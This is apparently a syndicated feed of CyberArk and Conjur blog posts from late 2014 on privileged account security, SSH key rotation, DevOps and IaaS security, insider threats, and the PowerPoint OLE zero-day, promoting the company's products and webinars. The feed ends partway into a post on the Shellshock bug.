In a sense, cybersecurity is a resource allocation problem. Addressing the risks requires a combination of understanding and minimizing the threat surface, building a robust and fault-tolerant detection and prevention system into your infrastructure, and ensuring that you have world-class audit and response mechanisms in place to minimize the time and cost of dealing with issues as they arise.

As infrastructure changes, the best practices for “baking in” security are also evolving. Over the course of the past few months, we’ve spent a significant amount of time working with our partners and customers on how to build out a strong security model for highly automated infrastructure. Three consistent themes have emerged from those discussions: the need for good permissions management, strong secrets storage and distribution, and robust audit and compliance:

In other words, a model is emerging for securing modern infrastructure:

 

 

]]>
DevOps Hackathon: Conjur at AWS Re:Invent 2014 https://www.cyberark.com/blog/devops-hackathon-conjur-at-aws-reinvent-2014/ Mon, 03 Nov 2014 10:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/devops-hackathon-conjur-at-aws-reinvent-2014/  

Are you heading to AWS Re:Invent 2014, in Las Vegas? Conjur is!

We’re going to be set up at booth #K6, talking about DevOps, security, and how to monitor, manage, audit, and secure modern infrastructure. Come stop by; we’ll also have our much-asked-after LDAP t-shirts on hand for anyone who says hello.

11_03_14

We’re also tremendously excited to be hosting the first Conjur Hackathon, led by our own Kevin Gilpin (CTO and founder). We have a fantastic suite rented at the Venetian (the hotel that the event is at), and on Wednesday we’ll be opening it up in two 2-hour blocks for anyone who is interested to install, implement, and hack on Conjur with Kevin.

We’ll have light refreshments on hand, and can’t wait to see what the community comes up with. Space is limited, of course — sign up here: http://www.conjur.net/conjur-aws-reinvent-hackathon/

]]> Microsoft PowerPoint – Presenting an APT Privileged Pathway https://www.cyberark.com/blog/microsoft-powerpoint-presenting-apt-privileged-pathway/ Fri, 31 Oct 2014 13:09:08 +0000 https://www.cyberark.com/blog//

By Yossi Dantes

Microsoft PowerPoint is one of the most popular collaboration applications in the world of business – it’s also the latest pathway external attackers are taking to steal privileged accounts and launch advanced attacks.

Microsoft recently issued a temporary security fix for a zero day vulnerability that impacts every Microsoft OS except Windows Server 2003. The exploit allows attackers to launch targeted attacks using malicious PowerPoint documents sent in phishing emails.

According to the security bulletin, the vulnerability “resides within the OS’s code that handles OLE (object-linking and embedding) objects. The vulnerability is triggered by opening a PowerPoint (or any MSFT Office file) containing a malicious OLE object. Once triggered, attackers can gain the same user rights as the current user – including administrative and privileged user rights.”

Stealing and exploiting this level of access is critical for hackers to carry out their attacks.  Once the attacker gains this privileged foothold, they can elevate privileges to move about the network to conduct reconnaissance on the security architecture, identifying the systems they need to avoid to perpetrate their attack. Once this insider knowledge is gained, they can easily infiltrate systems and exfiltrate data. This level of insider/privileged access is the key on which all advanced attacks turn.  We’ve seen this time and again.

While this vulnerability is specific to Microsoft, the reality is that no OS is safe.  The Shellshock vulnerability was specific to Unix systems. DARPA, the research arm of the Department of Defense, recently highlighted similar vulnerabilities in Apple Inc. ’s OSX operating system. Security is not dependent on which OS you use – it’s dependent on how your organization is managing its privileged accounts.

Whether it’s through an OS zero day vulnerability, a phishing email, or any other perimeter tactic, attackers will get inside your organization, they will target privileged accounts, and if they’re successful, the chances are high that you will suffer a debilitating security incident.

This is why a least privileged approach on all servers and desktops is vital to securing any organization.  With a least privileged approach to security, attackers may get in, but they will not be able to get the administrative rights necessary to access the critical organization assets. This is an absolutely necessary step in any targeted attack. Preventing this level of access can help an organization stop a targeted attack before it starts.

This is why CyberArk created the On-Demand Privileges Manager (OPM) – to help our customers enforce ‘the principle of least privilege’ and lock down administrative accounts. With OPM, users can use their named accounts with standard user permissions, elevating themselves to execute commands and applications on a need basis (and based strictly on company policy). This allows all users to have the privileged access they need to do their jobs, without compromising the security posture of the entire organization.  This helps stop advanced attacks reliant on privileged exploitation early in the kill chain.

No matter what OS you’re using, applying and enforcing policy securing privileged accounts is critical to protecting your organization against the latest advanced threats.

]]>
Prevent Permanent, Unfettered Access to Critical Systems by Rotating SSH Keys https://www.cyberark.com/blog/prevent-permanent-unfettered-access-critical-systems-rotating-ssh-keys/ Thu, 30 Oct 2014 09:15:20 +0000 https://www.cyberark.com/blog//

By John Worrall

IT staff come and go – normal attrition, ending of a contract, switching providers – however, the millions of SSH keys they created while on the job live forever…unless you have a way to discover what keys still exist and manage them properly. SSH keys are an essential tool that IT rely on to do their job so they need to be secured like any other privileged credential.

One of the critical features of our Privileged Account Security Solution v9 release is proactive SSH key rotation, which focuses on eliminating the risk of permanent backdoors that lead directly to critical systems. Just like other privileged credentials, SSH keys are often created and then forgotten about.

Case in point – a colleague was recanting a story of a past job change where he left his former employer with thousands of SSH keys and was never asked to turn them over or kill them outright! They did eventually ask for a full list of keys….however, shutting them down was going to be a manual process.

While this is an extreme example of how SSH keys can be mishandled across organizations, it illustrates the potential security risk posed here. Just think about how often IT staff leave to go work for a competitor. A more common scenario is that IT staff typically store private SSH keys on their desktops or laptops. If one of their vulnerable endpoints were to become compromised, a targeted attacker could locate the private key, steal it and use it to advance an attack against the organization. As a result, SSH key rotation is a necessary part of every security strategy.

The prospect of frequently rotating a million keys can be daunting. Fortunately, once the SSH keys are consolidated under one central management system, this can be managed automatically, pushing out all new SSH keys with just one click of a button.

SSH keys are no different from other privileged credentials in that you need to proactively manage them. Find out more about how we can help you secure and manage your SSH keys.

]]>
Watch Our On-Demand DevOps Security Webinar https://www.cyberark.com/blog/watch-our-on-demand-devops-security-webinar/ Wed, 29 Oct 2014 11:47:00 +0000 https://cyberarkvx2.wpengine.com/blog/watch-our-on-demand-devops-security-webinar/  

We were very excited to host yesterday’s DevOps security webinar entitled DevOps, Security, and Modern Infrastructure with CTO Kevin Gilpin and founding team member Kevin O’Brien!

10_29_14

Over the course of the discussion, Kevin and Kevin looked at how security for DevOps is evolving, and how the new tools, principles, and methodologies of the DevOps movement are changing the landscape for information security. In considering these changes, the Conjur team outlined a set of best practices for DevOps security, including:

  • Establish Principles of Least Privilege
  • Enforce Separation of Duties
  • Define Role Based Access Control (RBAC)
  • Prove Compliance and Adherence
  • Manage Authorization (AuthZ) at Scale

We further explored how security for security’s sake inhibits productivity and the benefits that cloud brings, and how to consider and implement risk-appropriate rather than punitive controls.

Watch the DevOps security webinar to learn more about the future of DevOps security, how to architect a secure toolchain and infrastructure, and learn how to manage secrets and permissions at scale!

 

]]>
Security and DevOps – Why It Matters https://www.cyberark.com/blog/security-and-devops-why-it-matters/ Mon, 27 Oct 2014 16:49:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-and-devops-why-it-matters/  

Security and DevOps – Why Do Anything?

There are two truths in infosec: (a) nobody wants the security folks in their office, and (b) the security team knows it.

For a long time, security software and the budget and staffing it commanded were seen as costs of doing business; nobody really wanted to pay, and it was frequently getting in the way. Over the past couple of years, however, the thinking around infosec has begun to change direction. Done well, security is a business enabler, driving down cost and making it possible to adopt and use technologies faster and more safely than would be possible if done on their own.

Tony Bradley published a great article on the cost of cybercrime last week that underscores why budgeting for security is a vital indicator of innovation, especially for organizations that are embracing DevOps. Three specific points that he made stood out:

  • The cost of cybercrime in 2014 is “nearly 10 percent higher than the average cost in 2013.” In fact, according to the latest version of the Ponemon report, the cost of a breach for a US company is just over $12 million.
  • “The average time it takes to detect a malicious cyber crime attack is 170 days.”
  • Regarding the latest statistics, “many organizations view a report like this as interesting data, but still don’t believe it can happen to them.”

10_27_14

One of the conversations we often hear is that while development and operations tools and the infrastructure that they control may be evolving, but that their security approach is “good enough”. If Tony’s article could be distilled to a single point, it would be that this claim is indefensible.

We are in the midst of a significant evolution in the tools, technologies, and threat surface. It’s the responsibility of information security professionals to simultaneously adapt to those changes and to do so without getting in their way. The move towards configuration management, the near ubiquity of Agile development practices, and the growth in automation technologies means that mistakes are more costly than ever — a point strongly reinforced by the Ponemon study that Tony cites.

Security and DevOps: Data Worth Protecting

As the article linked to points out, “It’s imperative for organizations to implement the tools, and take the steps necessary to provide better protection, earlier detection, and quicker recovery from cyber crime attacks.”

The protection/detection/response model, which we looked at in detail in our three-part series on the evolving DevOps landscape, is very likely to be the foundation upon which any robust security program will be built moving forwards. To not do so, especially as the development and operations teams are taking crown-jewel level information such as code, product, and customer data.

DevOps is too important to not protect. The relationship between the security and DevOps team should be healthy and close, and focused on how to make sure that the tools being used can be monitored and protected without impeding efforts towards improving the design, development, release, and management of product.

 

 

]]>
How Many SSH Keys Have You Left Lying Around? https://www.cyberark.com/blog/many-ssh-keys-left-lying-around/ Thu, 23 Oct 2014 19:22:01 +0000 https://www.cyberark.com/blog//

By John Worrall

How do you prevent unauthorized groups or individuals from gaining access to your valuable information and belongings? A lock and keys – simple, right? Well, what happens when anyone can create a set of keys anytime they want, and keep or share them forever? In the enterprise, organizations are experiencing this very problem, and often don’t even know about it. SSH keys, for example, are created and used daily by IT to get direct, root access to critical systems. With these keys, users have ongoing, uncontrolled privileged access to a target system. And according to IDC, there could be more than one million of them in an average large enterprise!

Earlier this week we launched a major expansion to our Privileged Account Security Solution that covers end-to-end SSH key management, including the discovery of keys. The goal of the product is to address and solve the most common questions we discuss with customers around SSH keys:

  • How many SSH keys do I have? Of those, how many are orphaned?
  • What machines and accounts on the network can be accessed using SSH keys?
  • Which keys are carrying the most risk to my organization?

These are big questions that really only scratch the surface of SSH key vulnerabilities. Normal business operations aren’t the only way SSH keys can be created – there are also vulnerabilities like Shellshock that enable cyber attackers to create what seem to be legit keys. And like house keys, SSH keys can be stolen.

This is why we provide a free Discovery and Audit tool that addresses every privileged account, password and SSH key across the entire network. It’s critical to document the age of existing keys, map relationships between users and systems, and determine which keys pose a risk – either because they’re outside of the security policy or because they’re illegitimate keys that should never have been created.

Since we’re potentially talking about more than one million keys on average and this amount of data would be nearly impossible to dig through, we created an SSH Key Trust Map. This visual display shows every SSH key (including the orphaned ones) and what technology trusts each key, enabling access to privileged accounts.

SSH Keys Relationship Map

So if you’re trying to get a handle on your company’s exposure to unsecured SSH keys, we can help. Our solution discovers, secures and manages SSH keys as well as other privileged credentials in a single, integrated platform to identify, manage and protect against advanced external attackers and malicious insiders.

To learn more, read about CyberArk SSH Key Manager.

]]>
On the Future of IT, Part III: Securing DevOps Infrastructure https://www.cyberark.com/blog/on-the-future-of-it-part-iii-securing-devops-infrastructure/ Wed, 22 Oct 2014 15:14:00 +0000 https://cyberarkvx2.wpengine.com/blog/on-the-future-of-it-part-iii-securing-devops-infrastructure/  

Securing Modern Infrastructure

In the first two parts of this series, we’ve looked at the ideas that significant organizational change improves companies, and that the growing DevOps movement is an example of change in how infrastructure, development, and operations are blending together.

Today, in the third and final part of this series, I want to explore the security implications of this change, and offer some best practices and ideas for addressing them.

Over the course of my career in security, I’ve learned a few ground rules for designing an effective security program:

  • Strategically, security (and by extension, incident response) has three components: prevention, detection, and response. Tactically, each of these involves some mix people, process, and technology.
  • For prevention and detection, minimize the “people” component and maximize “process and technology”. Standardization and specialization are force multipliers. (For response, technology isn’t yet — and perhaps will never be — capable of replacing people.)
  • As a corollary, the more you invest on defining, supporting, standardizing, and automating prevention and detection, the less difficult response will be.
  • In a crisis, when time is of the essence, difficulty equates to cost. (Think of the iron triangle: if you don’t have time, and you need quality, you’re going to pay for it.)
  • Resist the temptation to “do it yourself” when it comes to process and technology. In almost every circumstance, you’re reducing standardization, adding complexity, and reinventing the wheel. Any money saved by doing it in-house will be significantly offset when a crisis emerges.

Making Friends, Influencing DevOps

With these ideas in mind, what will a good security program for a DevOps culture look like?

Fundamentally, it will be aligned with the same business-enabling values that DevOps itself brings: automation, continuous integration (or in this case, continuous monitoring), and avoidance of one-off solutions in favor of systematic good decision making and security.

10_22_14

What this will look like from a market perspective, from an infrastructure perspective, is a replacement for outdated methodologies of implementing identity, permissions, and secrets/key storage. Why these? Because they represent the areas where (1) infrastructure access is both defined (permissions) and controlled (secrets/keys), (2) they are the functional areas where moving to a more robust design (RBAC vs. hierarchical groups, for example) will improve the prevent and detection phases of the security model, and (3) these updates are ripe for standardization from vendor-developed software.

Putting it in Practice

Obviously, we have a bias for implementing this “automation of security for DevOps” idea, but putting that aside for a moment, let’s consider what it means to adopt any kind of security model here.

Security, traditionally, has been looked at through a lens of blocking business initiatives. At best, it’s a hot potato; nobody wants to be the one to be pointed at if something goes awry and data is lost, and it’s typically seen as a distraction by non-security professionals.

The difference in implementing the model from a DevOps perspective, however, is that we’re looking at embedding permissions and key management into the infrastructure from the ground up. What that means is that prevention and detection are intrinsic to, say, the rollout of Puppet, or VMWare, or whatever other tools might come into your infrastructure in the future. Instead of hand-cranking secrets storage, you’ll have a purpose-built and well defended secrets repository, along with a role-based access control model that determines who, what, where, when, and how those secrets should be accessed.

The value to a DevOps team is that by handling security in this way, they can focus on the more interesting problems (“how can we automate our build processes more effectively? What can we do to reduce our work-in-progress queue and release more quickly?”, and so on) than “how do we keep our audit guys from bugging us?”

In the same way that security melded with IT when users changed the model for application and device selection, we believe that it needs to do the same for DevOps, both because it’s good practice (per the “ground rules” above) as well as an essential part of building and securing DevOps infrastructure moving forwards.

 

]]>
SSH Keys: The Powerful, Unprotected Privileged Credentials https://www.cyberark.com/blog/ssh-keys-powerful-unprotected-privileged-credentials/ Tue, 21 Oct 2014 08:00:29 +0000 https://www.cyberark.com/blog//

CyberArk-SSH-Keys-Infographic-1014When thinking about privileged accounts – and the credentials used to access them – passwords typically come to mind. Yet passwords are only part of the equation. The Secure Shell (SSH) key, a low-profile, “Swiss Army Knife” of IT teams, is one of the most heavily used access control and encryption protocols in the enterprise, providing direct, root access to critical systems. Yet SSH keys often fly under the radar of security teams. As a result, these powerful credentials are left unsecured and unmanaged, leaving gaping holes in security and providing attackers with easy, direct access to the heart of the enterprise.

Research by Ponemon Institute shows that three out of four enterprises have no security controls in place for SSH keys and that 51 percent of enterprises have already experienced an SSH key-related compromise. Sobering statistics, though not surprising, as SSH keys are often created without any oversight or management, and an average enterprise can have one million SSH keys in their environment. It’s time to start treating SSH keys like the privileged credentials they truly are.

Today, CyberArk unveiled comprehensive SSH key management as part of our Privileged Account Security Solution. Companies can now secure and manage SSH keys as well as other privileged credentials in a single, integrated platform to identify, manage and protect against advanced external attackers and malicious insiders.

Learn more about how CyberArk can help protect your organization’s SSH keys at www.CyberArk.com/SSH.

]]>
On the Future of IT, Part II: Saying Yes to DevOps https://www.cyberark.com/blog/on-the-future-of-it-part-ii-saying-yes-to-devops/ Tue, 21 Oct 2014 11:29:00 +0000 https://cyberarkvx2.wpengine.com/blog/on-the-future-of-it-part-ii-saying-yes-to-devops/  

How to Say Yes to DevOps?

Yesterday, I wrote about the idea that uncomfortable change often results in improved outcomes, and questioned whether we are looking at a moment of such change in the IT and security space as a result of the DevOps movement.

Today, I want to spend some time reflecting on this, and do so by considering a parallel trend I was witness to during my time at CloudLock (a great team, by the way, and leaders in helping companies secure end-user cloud applications like Google Apps and Salesforce). In a nutshell, the argument I am making is that DevOps is to modern IT as cloud was in the last technology cycle.

The Growth of Cloud – An Object Lesson

Seven years ago, Google launched Google Apps for businesses; it was the first time they made publicly available a set of tools (mail, calendaring, IM, and an early version of their office suite) that competed directly with the legacy tools that office workers had become used to — Outlook and Lotus, Office and its competitors, and so on. Over the course of the next few years, adoption of the tool, in part because it offered users an experience that was more collaborative and productive than was possible with the on-disk equivalents from Microsoft, IBM, Corel, and other older vendors.

There was a similar trend in sales automation and CRM tooling running in parallel, vis a vis Salesforce. While its roots are in the late 1990s, Salesforce released their developer platform in 2007, and since then their revenues grew to over $4b; largely purchased by sales management rather than IT, the platform has found its way into many companies infrastructures without having been procured through traditional channels.

10_21_14

What made both of these possible was the utility and efficiency that the products offered, coupled with direct adoption by their target communities. When they were engaged, IT and InfoSec reactions ranged from confusion to hostility, especially in the early days of these products’ growth. What has changed over the intervening 7 years is both the acceptance of the technologies (and the emergence of competitors, naturally), as well as the establishment of a market that provides those same IT and security professionals with the monitoring and security tools needed to meet both regulatory and organizational requirements around their use.

Nothing New Under The Sun

Flash forward to today. The DevOps movement, fueled by efforts of development and operations staff to make their workflows faster, their jobs easier, and their efficiency greater, is incredibly similar to what we saw with end-user adoption of cloud in the last decade. Tools like Puppet, Chef, and SaltStack are driving new infrastructure design and deployment; operations are segmenting out their environments via Docker and VMWare; development teams are building and testing software with Continuous Integration workflows via Jenkins, replacing SVN with GitHub, and otherwise choosing entire toolchains based on their needs rather than IT’s vendor management process.

What has not yet happened is the clear definition of the threat surface surrounding these decisions, or the subsequent creation of responses to ensure that organizations undergoing DevOps transformations are secure and safe. While understandable, closing this gap is critically important if DevOps is truly going to redefine the landscape for companies moving forwards.

Tomorrow, in the third and final part of this series, we’ll look at what the threat surface itself is and how to address it. I would love to hear from you as well – you drop me a line directly at kobrien@conjur.net.

 

]]>
On the Future of IT, Part I: Beowulf, IT, and Broken Pottery https://www.cyberark.com/blog/on-the-future-of-it-part-i-beowulf-it-and-broken-pottery/ Mon, 20 Oct 2014 14:43:00 +0000 https://cyberarkvx2.wpengine.com/blog/on-the-future-of-it-part-i-beowulf-it-and-broken-pottery/  

On the Future of IT

On my drive into the office, I’ve taken to listening to Audible.com versions of university lectures, at least temporarily replacing my old standby of NPR. I’ve not lost any of my appreciation for the local affiliate (WBUR), but I find that spending a couple of hours each day on a consistent topic passes the time more enjoyably.

This month, my topic of choice has been a survey of medieval European history, written and delivered by Professor Dorsey Armstrong, who teaches at Purdue. Partially inspired by my fascination (read: addiction) to Crusader Kings II, Armstrong’s depth of knowledge and delivery are both incredible; she’s as apt to tell a bawdy joke from early Anglo-Saxon literature as she is to launch into a spirited bit of Old English while reading from Chaucer.

10_20_14

On this morning’s drive, I was listening to her describe the Beowulf tale, and discuss how what was originally a story born of oral tradition was likely influenced by a scribe with religious leanings. Without diving too deeply into the details, one of the themes that Armstrong presents is that the Medieval period in general is defined following the collapse of the Roman empire in or around 476 AD as being about the rebuilding of European civilization as an amalgamation of Germanic, Christian, and Roman ideas and values, often despite profound tensions between them.

Western civilization is, I think most will agree, pretty successful.

What this led me to think about was how any endeavor that is built from stress ends up being stronger than those that are not. It’s as true for the societies medieval Europe as it is for muscle growth in the human body: where there is hardship, the end result is improved. Sam Sheridan, Harvard University alumnus, author, and mixed martial artist, often quotes Virgil when talking about this idea: Mundis Ex Igne Factus Est (“the world is born in fire”). The Japanese call it kintsugi, the art of repairing and thus improving things with gold.

Are we witness to a moment of similar rebuilding inside of information technology? What mix of cultures will define how the security, development, and operations will be construed in the coming years? Over the coming few days, we’ll take a look at these ideas in more detail, ranging from the legacy of BYOD and user-cloud selection to the nascent DevOps movement and its implications on how products are both built and secured. Stay tuned!

We’ll also be speaking on Wednesday afternoon at the MassTLC Information Security conference in Boston, doing a bit of crystal ball gazing and looking for answers to these questions (and more). If you’re in the area, we hope you’ll join us — the last chance to register is today!

 

 

]]>
Privileged Account Security Key Ingredient to ‘Evil Layer Cake’ https://www.cyberark.com/blog/privileged-account-security-key-ingredient-evil-layer-cake/ Thu, 16 Oct 2014 12:38:30 +0000 https://www.cyberark.com/blog//

By John Worrall

In a recent 60 minutes interview, FBI Director James Comey discussed the current state of threats to U.S. security.  Around eight minutes and fifty seconds into the interview, Comey starts to focus on the cyber-security threat and the need to transform the FBI to fight crime and espionage online with this great quote:

“I think of it as kind of an evil layer cake. At the top you have nation state actors, who are trying to break into our systems. Terrorists, organized cyber syndicates, very sophisticated, harvesting people’s personal computers, down to hacktivists, down to criminals.”

The cyber-threat we’re facing is rightfully getting attention at the highest levels. The NY Times reported recently that President Obama has been receiving periodic briefings on major cyber attacks along with his security briefings on physical terrorist attacks.

If security defenses have failed to keep pace with the ‘evil layer cake’ so thoroughly that the President is getting briefed specifically on incidents, what can we do? The most important step is to understand exactly how attacks are being carried out and what makes them so successful at bypassing perimeter security defenses.

The key ingredient in nearly every instance has been privileged credentials. They were critical in the recent banking attacks, they are the fulcrum on which the recent PoS/retail breaches swing, they are the reason intelligence organizations are targeting IT workers, and they were at the heart of the most devastating breaches to the U.S. intelligence community, including Ed Snowden and Chelsea Manning.

Why is this? Since the beginning of time, the best way to steal anything has been to look like you belong and act like an insider. In the digital world, the best way to transform into an insider is by stealing or exploiting privileged accounts. These are the most powerful credentials in any organization, designed to manage network systems, run services, or allow applications to communicate with one another. They are the keys to the IT kingdom.

We have been talking about how critical a security problem privileged accounts are for some time, yet organizations around the world are still leaving these incredibly powerful credentials unprotected and available to hackers.  Cyber security is predicated on our ability to starve attackers of information. Until we understand this and lock down the pathways of least resistance, security will remain elusive.

]]>
Join us at the MassTLC Security Conference! https://www.cyberark.com/blog/join-us-at-the-masstlc-security-conference/ Wed, 15 Oct 2014 10:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/join-us-at-the-masstlc-security-conference/  

Are you coming to the MassTLC Security Conference on October 22, 2014?

If so, we hope that you’ll join us at 3:20pm in the Morris Auditorium for our panel discussion on innovation in the information security space:

When
October 22, 2014
3:20pm-4:00pmWhere
Federal Reserve Bank of Boston
600 Atlantic Ave #100
Boston, Massachusetts 02210
United States
Morris AuditoriumTopic
Innovating in Information Security
This session will focus on how entrepreneurs, companies and investors all have an opportunity to help defend against information security attack. Discussion topics will range from what security challenges are gathering momentum, market insight, hiring employees and raising capital.

10_15_14

In this “fireside chat” style panel discussion, our own Kevin O’Brien will be joined by Greg Dracon from .406 Ventures and Jon Stavis of Fidelity Investments to discuss how the landscape for risk and information security is changing, looking at topics ranging from DevOps to data breaches. In addition, there will be a length Q&A period, giving the audience plenty of time to ask their own questions and dig into how and where the security market is going.

Of course, if you have any questions, comments, or want to catch up with Kevin before or after the panel, we’d be happy to help. Drop us a line directly at info@conjur.net.

 

]]>
The ‘Insider Threat’ is Privileged Access, not a Person https://www.cyberark.com/blog/insider-threat-privileged-access-person/ Tue, 14 Oct 2014 15:13:21 +0000 https://www.cyberark.com/blog//

By John Worrall

The standard reply to “what is an insider threat,” generally circles around the concept of a bad apple within the company and this is shortsighted. Principal investigators in Oxford University’s Corporate Insider Threat Detection research program have it right in their recent Harvard Business Review article, “The Danger from Within,” as:

The Insider threat comes from people who exploit legitimate access to an organization’s cyber assets for unauthorized and malicious purposes or who unwittingly create vulnerabilities.

However, researchers David M. Upton and Sadie Creese miss the mark on one critical aspect of the problem: privileged access is not restricted to employees, contractors or other individuals. They layout the problem like this:

You must diligently manage the privileges of all employees—including those with the highest levels of access to company systems, who are often the instigators of insider attacks. Prune your list of most privileged users regularly—and then watch the ones who remain to verify that they deserve your trust. Look for insider-threat-detection systems that can predict possibly preventable events as well as find events that have already occurred. Big data can be helpful in linking clues and providing warnings.

The problem is not where an attack starts or if an individual works for the company – it’s about an attack that’s already behind the traditional security perimeter. It would have been more accurate to stop at, you must diligently manage privileges. Simply put, privileged accounts turn an external attacker into an insider, moving freely across the network without detection. These privileged credentials are the true threat lurking inside your organization. If left unprotected, a malicious insider will use them to hurt your business, or an outside attacker will use them to act like an insider.

These accounts represent a huge attack surface, and are used by IT staff and exist in every piece of technology connected to your network – hardcoded passwords in applications, across devices, etc. They are the real insider threat to an organization. These accounts can provide absolute control over a company’s infrastructure, which is why security researchers like CyberSheath have highlighted that they have been at the epicenter of 100 percent of all advanced attacks.

The most common cybersecurity safeguards – vulnerability management, strong boundary protection, password policy, awareness programs – just don’t work when it comes to these types of situations, according to Upton and Creese.

If these common practices are so ineffective, then what can we do?

  • Integrate a company-wide privileged account security solution. Many companies chose only ‘high-risk’ network environments to protect, however, recent retail breaches show that every piece of the organization needs to be protected – from third-party vendor access to HVAC systems to PoS terminals.
  • Deploy analytics-based security practices to monitor privileged user-behavior. By monitoring the behavior of even those with the highest level of access to company systems, you will be alerted to anomalous behavior more quickly so you can respond as necessary.
  • Reassess your list of privileged users regularly. Many companies are unaware of the number of privileged accounts that are left forgotten and unused – many times left behind after an acquisition or merger. Make sure to locate and close any of these discarded accounts that can be easily exploited.
  • Use one-time passwords that expire after a single use. Using one-time passwords takes the onus off of your IT staff to choose passwords complex enough or change passwords often enough. Since we’re far from a world without passwords, one-time password use is one of the best solutions for secure authentication.

The sooner organizations understand its privileged accounts are the true insider threat, the quicker effective security strategies can be deployed. If you’re not identifying, controlling and monitoring all privileged account activity, then you’re leaving the door wide open for a breach.

]]>
Getting IaaS Security Right https://www.cyberark.com/blog/getting-iaas-security-right/ Tue, 14 Oct 2014 11:26:00 +0000 https://cyberarkvx2.wpengine.com/blog/getting-iaas-security-right/  

In June of this year, the Ponemon Institute published a report on how the use of cloud technology changes the breadth and cost of data breaches. A few of the more interesting statistics that jumped out at us:

  • 66% of respondents say their organization’s use of cloud resources diminishes its ability to protect confidential or sensitive information
  • 62% percent of respondents do not agree or are unsure that cloud services are thoroughly vetted before deployment.
  • 69 percent of respondents do not agree that their organization’s cloud service use enabling security technologies to protect and secure sensitive and confidential information

In other words, cloud infrastructure, while continuing to gain traction in the market, is also viewed as inherently more risky than on-premise technology.

Interestingly, however, the market for these projects is continuing to grow. Gartner predicts that by 2016, IaaS and PaaS spend will surpass SaaS. Businesses aren’t thinking about “going cloud” any more – they’re there, and they are moving increasingly important parts of their businesses into the infrastructure offered from Amazon, Microsoft, Rackspace, and others.

Understanding the Threat Surface

If you step back a few years, you can see that in the SaaS market, security was initially perceived of as a blocker to cloud adoption. Moving sensitive data to Salesforce, Google Apps, Workday, and the like was prohibitively difficult; while on-premise systems had strong firewalls, DLP, and other technical answers to threat, the cloud alternatives did not.

10_14_14

Over time, those challenges were considered in cloud-specific ways: instead of preventing users from sharing data, for example, technologies emerged that were able to find and remediate exposure of PII, PCI, PHI, and other sensitive information without driving users into shadow IT systems.

There is a strong analogue in this evolution of thought to what we expect to see in the IaaS trend that Gartner identifies. Consider that in the Ponemon report, 69% of respondents said that an increase in infrastructure-as-a-service would decrease their organization’s likelihood of a data breach. Why is this?

The IaaS Risk and Response Model

We believe that it is a function of not understanding the threat surface for IaaS. In the same way that firewalls did not provide security for organizational data stored in Salesforce, the SaaS-level solutions (encryption, tokenization, and compliance governance) do not map well to IaaS. In fact, the market has almost no answer for these risks yet.

This is where Conjur sits. We believe that the threats to IaaS have to do with privileges and secrets management. When properly managed, an organization can move infrastructure into automated cloud environments without worrying about user or service-level breaches, insider or outsider abuse, or escalation of privileges based on poorly secured SSH keys, SSL certs, or other secrets.

The conversation is just beginning, but as the Ponemon statistics reveal, it’s a critical one to have. We will be diving into it in more depth in our upcoming webinar on October 28, 2014 — you can register by clicking the button below, and join us to learn more about how these risks play out in practice, and how to address them within your organization.

Hope to see you there!

]]>
Passwords are not Treated as Critical to Cyber Security https://www.cyberark.com/blog/passwords-treated-critical-cyber-security/ Thu, 09 Oct 2014 14:47:17 +0000 https://www.cyberark.com/blog//

By John Worrall

Over the past year, the password has taken center stage as a critical cyber security problem, illustrated by the Gmail hack, cracking iCloud security and countless others. In response, numerous opinions have been expressed over ways to stop this from happening, including our own.

Yet, organizations continue to allow employees to select their own passwords for corporate assets.  Does this mean credentials are not a critical piece of the cyber security strategy? Employees are not expected to manage other key security processes, such as installing antivirus, monitoring updates, reviewing vulnerability reports, etc., yet passwords are ok for employees to own?

Some passwords are far more powerful than others – such as those for privileged accounts – and these absolutely need to be considered a critical cyber security matter rather than simply another password for IT staffers to manage.

The best policy for organizations is to simply not allow employees to set their privileged credentials to begin with.  Using a dedicated enterprise password management solution can prevents users from ever knowing the privileged credentials or even having to type anything in, while still giving them the immediate access business requires.  Why is it important to eliminate typing in a password?

At this year’s Black Hat Conference, researchers from the University of Massachusetts Lowell demonstrated a new twist to an old conman skill – demonstrating how to intercept passwords visually, without hacking anything. This is a must read!

Using an ATM interaction, the researchers used multiple cameras independently, including Google Glass, web cameras, smartphone cameras and even smartwatches to record the user’s hand and finger motions as they entered their PIN. The cameras couldn’t see the keys, just the hand movements. This movement was then mapped over an image of a soft keyboard and voila! The PIN was stolen without malware, a skimmer, exploiting a zero-day or any other breach.

Cameras are as ubiquitous today as laptops and both are commonly used in the same location. Think about the last time you logged into your work laptop at an airport. How many people did you notice taking photos or videos? How about the coffee shop you last logged in at? In the world of advanced threats where employees are targeted as an easy way to access a network, making sure passwords are treated as a critical security matter is a smart move.

For more information on how your company can secure its privileged passwords and credentials and prevent unwanted access into critical assets, check out our Enterprise Password Vault and Privileged Session Manager products.

]]>
Conjur DevOps Security Webinar – October 2014 https://www.cyberark.com/blog/conjur-devops-security-webinar-october-2014/ Thu, 09 Oct 2014 10:35:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-devops-security-webinar-october-2014/  

If you’ve been watching the infosec news, you know that the past few weeks have been remarkable. The largest data breach in US history was revealed (at JPMorgan), ShellShock has reverberated through the industry, and the technologies and security software deployed at many large organizations are failing to keep up.

10_09_14There is no silver bullet. Anyone who says otherwise is simply trying to sell you something.

But, there are new threat surfaces, new infrastructure components that need to be considered in terms of organization security stance, and new best practices for addressing them. This month, we will be holding the first in a series of webinars that address these topics, led by DevOps expert Kevin Gilpin and security industry veteran Kevin O’Brien (formerly of @stake and CloudLock). Topics that will be addressed include:

  • How the DevOps movement represents an opportunity to increase security without impeding innovation
  • The implications of ShellShock (and Heartbleed, and myriad other breaches) for good secrets management, from SSH keys to SSL certs
  • A real-world example of how to architect a secure DevOps system, encompassing both permissions and secrets management

Space is limited, so register early if you are interested in learning more about DevOps, cloud infrastructure, and how information security relates to both!

]]>
Getting past the Shellshocker Cyber Threat with Privileged Identity Management https://www.cyberark.com/blog/getting-past-shellshocker-cyber-threat-privileged-identity-management/ Tue, 07 Oct 2014 17:35:31 +0000 https://www.cyberark.com/blog//

By Yair Sade

At this point, you’ve probably heard of the newest cyber threat to hit the Internet – the Shellshock bug. Said to be a more serious vulnerability than Heartbleed, Shellshock has been lurking in the massively popular software package Bash, a command line interpreter, or shell, that provides a powerful, flexible way to run commands on a computer. A highly stealthy vulnerability, Shellshock has gone undetected in Bash for more than two decades, counting as yet another advanced persistent threat factor!

